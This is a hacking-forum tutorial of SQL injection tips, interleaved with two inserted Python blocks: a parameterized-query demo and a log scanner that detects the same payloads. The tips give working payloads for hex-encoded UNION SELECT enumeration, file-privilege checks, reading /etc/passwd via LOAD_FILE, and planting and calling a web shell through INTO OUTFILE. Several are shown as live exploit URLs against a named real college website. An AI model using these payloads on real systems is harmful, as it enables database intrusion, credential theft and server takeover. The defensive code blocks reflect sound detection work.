Assalam O Alikum
FOCSoft Friends, Readers
Tips/Tutorial By  ..:::PriNcE HaxOr:::..

In this article I will give you some SQL injection tips.

Tip 1: Avoiding the use of quotes (' and ")

When we are injecting a website and reach a point where we need a WHERE clause with input data, for example when trying to find the column names of the table admin, we mostly use this query:

select column_name from information_schema.columns where table_name='admin'

But it doesn't work all the time (the quotes may be filtered or escaped). What to do next?

We can avoid the use of quotes: we can use hex values instead, or convert the string with MySQL CHAR().
In Hackbar, use SQL > MySQL > MySQL CHAR() for that.

Or

We can use the encoding options in Hackbar: Encoding > Hex Encoding > String to 00ff00ff.
When you input the string "admin" it will come out as "61646d696e".
We have to add 0x in front of it, making it 0x61646d696e,
and then put it in our query, which will look like:

select column_name from information_schema.columns where table_name=0x61646d696e
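
The hex-literal trick above is easy to reproduce and, for the same reason, easy to mishandle on the defending side. As an added example (not code from the original post), the Python below encodes and decodes MySQL 0x literals the way the Hackbar step does, shows that a filter which only strips quote characters lets such a literal through untouched, and shows the actual fix: binding the value as a query parameter. The parameterized lookup is demonstrated with the standard-library sqlite3 driver and a constructed in-memory table, an assumption on my part since the post is about MySQL; the binding behaviour is the same with a MySQL driver.

```python
import sqlite3
from typing import List


def mysql_hex_literal(text: str) -> str:
    """Encode text as a MySQL 0x... literal, the same thing the Hackbar step does."""
    return "0x" + text.encode("utf-8").hex()


def from_mysql_hex_literal(literal: str) -> str:
    """Decode a 0x... literal back to text (useful when reading logs)."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


def naive_quote_filter(value: str) -> str:
    """A blacklist 'fix' that only strips quote characters.
    A hex literal contains no quotes, so it passes through unchanged."""
    return value.replace("'", "").replace('"', "")


def build_unsafe_query(table: str) -> str:
    """String concatenation: whatever survives the filter becomes part of the SQL."""
    return ("SELECT column_name FROM information_schema.columns "
            f"WHERE table_name={naive_quote_filter(table)}")


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a real lookup table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t (name TEXT)")
    conn.executemany("INSERT INTO t VALUES (?)", [("admin",), ("guest",)])
    return conn


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> List[str]:
    """Bound parameter: the driver sends the value as data, never as SQL text,
    so '0x61646d696e' is compared as a twelve-character string, not decoded."""
    rows = conn.execute("SELECT name FROM t WHERE name = ?", (name,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    lit = mysql_hex_literal("admin")
    print(lit, "->", from_mysql_hex_literal(lit))
    print(build_unsafe_query("'admin'"))   # the filter breaks the legitimate quoted value
    print(build_unsafe_query(lit))         # ...but leaves the hex literal intact
    conn = demo_db()
    print(lookup_parameterized(conn, "admin"), lookup_parameterized(conn, lit))
```

The point of the last two calls: with a bound parameter the hex string finds nothing, because it is compared as a literal string rather than being interpreted by the SQL parser. A quote blacklist, by contrast, breaks legitimate input and does nothing against input that never contained a quote.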
Tip 2: Search table names for a specific column

You inject a website with a big and awkward database, you get lots of table names and you
don't know which table might contain login details.
So what are you going to do with it?
Usually you retrieve the table names and then move on to the columns to find login records,
but in this case we will scan all table names for some specific column across all databases.
Let's say our specific column is "user".
To find out which table names contain this column we use a query like:

UNION SELECT table_name From Information_Schema.columns where column_name="user"

or, if it doesn't work, we can hex the column name (in our case, the hex of "user" is 0x75736572):

SELECT table_name From Information_Schema.columns where column_name=0x75736572
Live demo:

http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,group_concat(table_name))+from+information_schema.columns where column_name=0x75736572

[Image: x9g0.png]

This query will look in all databases, but if you only want to search the current database you can add an AND condition to the query, making it look like:

UNION SELECT table_name From Information_Schema.columns where column_name=hex_of_column_name and table_schema=database()

Tip 3: Testing whether the current DB user has file read/write privileges

First you need to check the database user.
You can find it using user(),
and the query will return data like root@localhost, user@localhost or just user / anything.

So you got the username, what's next?
How to check whether the user has read/write (FILE) privileges?
Easy, use this query (file_priv is either Y or N):

select file_priv from mysql.user where user='username'

Sometimes you need to avoid quotes and use hex instead.

Live demo:

http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,group_concat(file_priv)+from+mysql.user where user=0x637365

Tip 4: Live demo of reading /etc/passwd

http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,LOAD_FILE(0x2f6574632f706173737764))--


Tip 5: What next if you got write permissions?

If you have write permissions we can write our shell into any writable directory of the website, but how?
Using the INTO OUTFILE function. But how to use it?

SELECT '' INTO OUTFILE '/var/www/dir/mad.php'

NOTE: /var/www/dir/mad.php is just an imaginary directory for this article; you have to find the root path yourself :)
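For defenders, the requests in Tips 2 to 5 share recognisable features: a UNION SELECT, references to information_schema or mysql.user, a LOAD_FILE() or INTO OUTFILE, and 0x hex literals that hide the real strings. The Python below is an added example and not part of the original post: it scans constructed web-server log lines (placeholder client IP and paths; the payload shapes mirror the demos above) for those indicators and decodes the hex literals so an analyst can see at a glance which table, column or file was being asked for.

```python
import re
from typing import Dict, Iterable, Iterator, Optional
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the original post). Host, client IP and
# paths are placeholders; the payload shapes follow the tips above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=7 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=-7+union+select+1,'
    'concat(0x3c2f7469746c653e,group_concat(table_name))+from+information_schema.columns'
    '+where+column_name=0x75736572 HTTP/1.1" 200 734',
    '203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /index.php?id=-7+union+select+1,'
    'group_concat(file_priv)+from+mysql.user+where+user=0x637365 HTTP/1.1" 200 610',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=-7+union+select+1,'
    'concat(0x3c2f7469746c653e,LOAD_FILE(0x2f6574632f706173737764))-- HTTP/1.1" 200 1920',
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
HEX_LITERAL_RE = re.compile(r'0x([0-9a-fA-F]{2,})\b')

# Each indicator is a regex matched against the URL-decoded, lower-cased request.
INDICATORS = {
    "union_select": r"union\s+(all\s+)?select",
    "information_schema": r"information_schema\.",
    "mysql_user_table": r"mysql\.user",
    "load_file": r"load_file\s*\(",
    "into_outfile": r"into\s+(out|dump)file",
}


def decode_hex_literal(literal: str) -> Optional[str]:
    """Turn a MySQL 0x... literal into text when it decodes to printable ASCII."""
    digits = literal[2:] if literal.lower().startswith("0x") else literal
    if len(digits) % 2:
        return None
    try:
        text = bytes.fromhex(digits).decode("ascii")
    except ValueError:  # bad hex digits or non-ASCII bytes
        return None
    return text if text.isprintable() else None


def analyze_request(log_line: str) -> Dict[str, object]:
    """Return the decoded request, the indicators it tripped, and decoded hex literals."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return {"query": "", "indicators": [], "hex": {}}
    # unquote_plus turns '+' into spaces, which is how PHP sees the query string.
    query = unquote_plus(m.group(1))
    lowered = query.lower()
    indicators = [name for name, pat in INDICATORS.items() if re.search(pat, lowered)]
    hex_values: Dict[str, str] = {}
    for h in HEX_LITERAL_RE.finditer(query):
        lit = "0x" + h.group(1)
        decoded = decode_hex_literal(lit)
        if decoded is not None:
            hex_values[lit] = decoded
    return {"query": query, "indicators": indicators, "hex": hex_values}


def scan(lines: Iterable[str]) -> Iterator[Dict[str, object]]:
    """Yield only the requests that tripped at least one indicator."""
    for line in lines:
        result = analyze_request(line)
        if result["indicators"]:
            yield result


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["indicators"], hit["hex"])
```

On the constructed lines the benign request produces nothing, while the three others are flagged and their literals resolve to "user", "cse" and "/etc/passwd" (plus the "</title>" marker used to make output visible in the page). In practice the decoder matters as much as the keyword list: a hex literal that decodes to a path or a table name is a much stronger signal than the keyword alone.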

Tip 6: How to access the shell?

Just go to the directory you provided, like this:

yourwebsite.com/dir/mad.php?mad=whoami
